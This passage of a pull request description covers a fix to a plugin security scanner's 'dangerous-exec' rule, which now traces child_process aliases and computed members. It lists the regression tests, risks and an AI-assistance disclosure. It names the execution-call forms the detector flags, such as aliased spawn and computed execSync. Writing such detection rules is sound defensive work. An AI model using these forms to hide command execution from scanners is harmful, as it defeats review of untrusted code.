  4. Unrelated aliases bound from a non-`child_process` module do NOT fire even when the source-wide `child_process` gate passes — proving the fix is provenance-scoped, not source-wide token correlation.
  5. Unrelated computed `spawn`/`execSync` calls on non-`child_process` receivers do NOT fire even when `child_process` is present elsewhere — the P1 over-capture is closed.
  6. Computed `exec` on a non-`child_process` receiver (e.g. a `RegExp`) stays suppressed — the `RegExp.exec` exclusion is preserved.
  7. All pre-existing scanner tests pass unchanged; new regression cases pass (40 total).
- What was not tested: A full `openclaw security audit --deep` end-to-end run on a real plugin tree (the scanner path itself — `scanSource()` — is exercised directly, which is the exact code path the audit command invokes). Multi-line re-export chains (`export { spawn as launch } from "child_process"`) were not covered; the binding collector handles direct imports/requires only, which matches the issue's "narrow fix" scope.

## Root Cause (if applicable)

The `dangerous-exec` rule was never binding-aware: its pattern matched only bare command names, its `requiresContext` gate only checked that the string `child_process` appeared somewhere in the full source, and `isBenignMemberExecMatch` used a hard-coded receiver allowlist (`cp|childProcess|child_process`) to exclude `RegExp.exec`. PR #116222 (merged) later widened per-occurrence reporting but did not touch binding attribution, so aliased and computed forms remained invisible. The original version of this PR then introduced computed-member matching but only provenance-checked `exec`, leaving other watched methods (`spawn`, `execSync`, …) to over-capture any computed call when `child_process` was merely present — the P1 follow-up in this push closes that by requiring a proven receiver for every watched computed method. Provenance: introduced by the original `dangerous-exec` rule; made visible by #116222's per-occurrence reporting widening the detection gap.

## Regression Test Plan (if applicable)

New cases added to `src/skills/security/scanner.test.ts`:
- Positive (in `scanRuleCases`): ESM import alias, CJS destructured alias, computed member, namespace-alias computed `exec`, namespace-alias computed `execSync` (new method coverage).
- Negative (new `it` blocks): alias not from `child_process` (provenance scoping); computed `exec` on a non-`child_process` object (`RegExp.exec` preserved); unrelated computed `spawn`/`execSync` calls when `child_process` is present (P1 fix); unrelated computed `spawn` on a literal-named non-alias receiver (P1 fix).

## User-visible / Behavior Changes

Scanned sources that previously scanned as `clean` will now correctly emit a critical `dangerous-exec` finding when they invoke `child_process` through an import/destructured alias or a computed member on a proven `child_process` namespace alias. Sources that use unrelated computed `spawn`/`execSync` (etc.) calls are NOT flagged. Sources that do not use these forms are unaffected.

## Security Impact (required)

- [x] New permissions/capabilities? No
- [x] Secrets/tokens handling changed? No
- [x] New/changed network calls? No
- [x] Command/tool execution surface changed? No — the change only tightens an advisory source-scanning heuristic; it does not alter any runtime execution surface.
- [x] Data access scope changed? No

## Human Verification (required)

- Verified scenarios: All positive forms produce a critical finding via real `scanSource()`; the negative forms (non-`child_process` alias, `RegExp.exec`-style computed call, unrelated computed `spawn`/`execSync` on non-`child_process` receivers) produce none; pre-existing unrelated test failures reproduce identically on plain `origin/main`, confirming they are pre-existing and unrelated to this change.
- Edge cases checked: `RegExp.exec` exclusion preserved; alias-call attribution suppresses member calls (`obj.launch(` is not flagged); computed receiver lookup correctly resolves `proc[` slice; provenance applied to every watched computed method, not only `exec`.
- What you did NOT verify: Full `openclaw security audit --deep` on a real plugin directory tree; multi-line `export ... from "child_process"` re-export chains.

## Compatibility / Migration

- [x] Backward compatible? Yes — no exported type or function signature changed; the scanner stays regex-based with no AST.
- [x] Config/env changes? No
- [x] Migration needed? No

## Best-fix Verdict

- **Best fix**: Yes. A narrow provenance-aware binding pass is the right fit: it preserves the scanner's low-complexity heuristic model, scopes attribution to actual `child_process` imports/requires (avoiding source-wide token-correlation false positives), closes all four false-negative forms, and — per the P1 follow-up — requires a proven receiver for every watched computed execution method so unrelated `spawn`/`execSync` computed calls do not over-capture.
- **Refactor needed**: No. Introducing a full AST/parser was deliberately avoided to match the existing heuristic model and the issue's "narrow fix" guidance.
- **Alternative considered**: A source-wide token rule (any `launch(` + `child_process` anywhere) — rejected because it would flag unrelated `launch()` functions whenever `child_process` appears elsewhere, the exact false-positive class the issue asks to avoid.

## AI Assistance

- **AI-assisted**: Yes
- **Co-Authored-By**: Maas <noreply@anthropic.com>
- **Human confirmed understanding of code changes**: Yes
- **AI prompts / session excerpts**: Analyzed issue #116255; designed a provenance-aware binding collector; iterated the computed-`exec` receiver lookup against the real `scanSource()` path; addressed ClawSweeper P1 by extending receiver provenance to all watched computed execution methods and adding negative regression coverage for unrelated computed `spawn`/`execSync`.

## Risks and Mitigations

- **Highest risk area**: False positives if the binding collector over-captures aliases. Mitigation: `collectChildProcessBindings` only collects from import/require statements whose source string is literally `child_process` or `node:child_process`, so an alias bound from another module is never attributed. A negative regression case (`import { spawn as launch } from "./other-module"`) guards this.
- **Computed-member false positives (all methods)**: The computed branch recognizes `["exec"|"execSync"|"spawn"|... ](` on any receiver, but `isBenignMemberExecMatch` suppresses it unless the receiver is a proven namespace alias or a literal `child_process` name — for EVERY watched method, not only `exec`. This preserves the `RegExp.exec` exclusion and prevents unrelated `worker["spawn"]()`/`bus["execSync"]()` from firing when `child_process` is merely present. Negative cases (`re["exec"](value)`, `worker["spawn"](task)`, `bus["execSync"]("echo hi")`, `pool["spawn"](job)`) guard this.
- **Compatibility**: No exported API or runtime execution surface changed; existing literal detections and benign exclusions pass unchanged (pre-existing tests green). Not a breaking change.

---

